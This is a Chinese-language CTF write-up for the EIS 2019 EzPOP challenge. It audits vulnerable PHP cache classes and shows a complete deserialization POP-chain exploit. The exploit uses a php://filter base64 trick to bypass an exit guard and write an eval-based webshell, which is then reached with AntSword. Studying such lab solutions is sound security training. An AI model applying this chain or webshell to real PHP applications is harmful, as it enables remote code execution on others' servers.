[EIS 2019]EzPOP 1
目录
考察内容
解题思路
解题流程
新知识点
题目地址
考察内容
反序列化,文件上传,代码审计
解题思路
首先耐心阅读完每段代码,发现__destruct,unserialize(),考察反序列化知识,file_put_contents()考察文件上传知识。
第一:发现file_put_contents函数有两个参数filename和data,所以一个是写入shell的路径和shell的数据
data与死亡exit进行连接(可绕过)
第二 :filename参数是options['prefix']和$name进行拼接的结果,而这里的**$name是形参**,所以这个$name是A类的key变量,是由save函数传递过来的由于options[‘prefix’]可控所以这里我们可以使
options['prefix']="php://filter/write=convert.base64-decode/resource="; key="webshell.php";
第三:构造shell的内容,也就是data变量,而data变量被serialize函数处理,是通过set函数中的$value变量传递过来的,而$value变量是A类中的**$contents变量传递**过来的,所以我们可以构造cache这个变量为数组,然后经过两个函数的处理,我们可以控制complete这个变量为shell的数据,经过json_encod这个函数的处理之后,由于json格式的字符都不满足base64编码的要求,所以我们可以将数据进行base64编码绕过,也就是
A->complete=base64_encode('xxx',base64_encode('<?php @eval($_POST["ro4lsc"]);?>'))
首先将shellcode进行base64编码使得base64decode的时候不会影响其内容,然后再次进行base64_encode是为了绕过死亡exit,由于解码之后只剩21个字符,所以这里需要自己添加三个字符,使得前面有24个字符可以base64正常解码不影响后面shellcode的执行那么到这里data的内容也构造好了,
第四:可是我们发现使用php伪协议只解了一次编码,而我们这里经历了两次base64编码前面提到了一个serialize函数
可以看到返回值是$serialize,也就是说这里我们可以让这个变量为base64_decode函数对data变量进行解码。
第五:public function getForStorage这里我们还需要传入一个cache为数组内容为空
A->cache=array();
第六:现在我们可以看A类save函数这个地方的利用很重要,它调用了getForStorage函数,后面的$this->store这个地方得是对象B才能调用set函数。所以
A->store = new B();
解题流程
代码审计
<?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store = $store; $this->expire = $expire; } // 对变量进行赋值 public function cleanContents(array $contents) { $cachedProperties = array_flip([ 'path', 'dirname', 'basename', 'extension', 'filename', 'size', 'mimetype', 'visibility', 'timestamp', 'type', ]); foreach ($contents as $path => $object) { if (is_array($object)) { $contents[$path] = array_intersect_key($object, $cachedProperties); } } return $contents; } // array_flip() 用于反转/交换数组中所有的键名以及它们关联的键值 // => 简单来说就是=>符号来分隔键和值,左侧表示键,右侧表示值 // array_intersect_key() 比较两个数组的键名,并返回交集: // foreach() 循环用于遍历数组每一次循环,当前数组元素的键与值就都会被赋值给 $key 和 $value 变量(数字指针会逐一地移动),在进行下一次循环时,你将看到数组中的下一个键与值。 // 过滤与cachedProperties变量中键不同的值 public function getForStorage() { $cleaned = $this->cleanContents($this->cache); return json_encode([$cleaned, $this->complete]); } // Storage 存储 // 对cache变量的内容进行过滤,传递给cleaned,最终返回将cleaned内容转换为json格式后传给complete。 // 因为不存在cache变量,所以需要我们构造,所以cache可控,所以complete可控。 public function save() { $contents = $this->getForStorage(); $this->store->set($this->key, $contents, $this->expire); } // 将getForStorage函数的返回值赋给contents,然后用store变量调用set函数 // set函数存在于B类中 public function __destruct() { if (!$this->autosave) { $this->save(); } } } // 如果不存在autosave变量就调用save函数 class B { protected function getExpireTime($expire): int { return (int) $expire; } // 将expire变量转换为int类型 public function getCacheKey(string $name): string { return $this->options['prefix'] . $name; } // 拼接字符串 // 发现这里的options[‘prefix’]可控 protected function serialize($data): string { if (is_numeric($data)) { return (string) $data; } $serialize = $this->options['serialize']; return $serialize($data); } // 将传入的data参数将会格式化为string类型 // 可以看到$serialize变量可控 public function set($name, $value, $expire = null): bool{ $this->writeTimes++; if (is_null($expire)) { $expire = $this->options['expire']; } $expire = $this->getExpireTime($expire); $filename = $this->getCacheKey($name); $dir = dirname($filename); if (!is_dir($dir)) { try { mkdir($dir, 0755, true); } catch (\Exception $e) { // 创建失败 } } $data = $this->serialize($value); if ($this->options['data_compress'] && function_exists('gzcompress')) { //数据压缩 $data = gzcompress($data, 3); } $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data; $result = file_put_contents($filename, $data); if ($result) { return true; } return false; } // is_null()判断参数是否为NULL,若为空,则将options['expire']赋值给expire // expire变量调用了getExpireTime这个函数,格式化为int类型 // filename变量调用了getCacheKey这个函数,所以filename这个变量最终的值是和options[‘prefix’]拼接而成,然后根据filename创建目录 // 接着看到data变量调用了serialize函数,正好这个函数需要传入一个值 // 接下来对data进行压缩 // 最后这个地方data数据与<?php exit();?连接,也就是说即使我们传上了木马也无济于事,会直接退出,也就是PHP中的死亡exit(). } if (isset($_GET['src'])) { highlight_file(__FILE__); } $dir = "uploads/"; if (!is_dir($dir)) { mkdir($dir); } unserialize($_GET["data"]);
payload:
<?php class A{ protected $store; protected $key; protected $expire; public function __construct() { $this->cache = array(); $this->complete = base64_encode("xxx".base64_encode('<?php @eval($_POST["ro4lsc"]);?>')); $this->key = "shell.php"; $this->store = new B(); $this->autosave = false; $this->expire = 0; } } class B{ public $options = array(); function __construct() { $this->options['serialize'] = 'base64_decode'; $this->options['prefix'] = 'php://filter/write=convert.base64-decode/resource='; $this->options['data_compress'] = false; } } echo urlencode(serialize(new A()));
验证
使用?data=传递参数,它会在当前工作目录创建一个shell.php,菜刀orAntSword连接getshell。
新知识点
php://filter的妙用
这个地方data数据与<?php exit();?>连接,也就是说即使我们传上了木马也无济于事,会直接退出,也就是PHP中的死亡exit(),但是也不是没有绕过的方法,这里引用@p神的一篇文章由于<、?、()、;、>、\n都不是base64编码的范围,所以base64解码的时候会自动将其忽略,所以解码之后就剩phpexit了,但是呢base64算法解码时是4个字节一组,所以我们还需要在前面加个字符
题目地址
https://buuoj.cn/challenges
